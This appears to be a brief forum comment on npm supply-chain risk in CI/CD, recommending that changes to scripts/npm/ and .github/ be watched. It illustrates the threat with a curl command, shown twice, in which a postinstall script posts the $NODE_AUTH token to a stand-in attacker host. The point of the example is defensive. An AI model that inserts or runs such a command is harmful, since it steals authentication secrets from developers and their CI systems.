I think attacker could still do this in a post install script:
curl -d secret=$NODE_AUTH https://attackershost.example/capture_secret
curl -d secret=$NODE_AUTH https://attackershost.example/capture_secret
Though, one should be very leery of anything that touches certain paths... for the most part, I tent to use scripts/npm/ for anything run from package.json and would also watch out for any changes in .github/
It depends on a bit of due diligence. It's not any different than other CI/CD platforms in any meaningful way.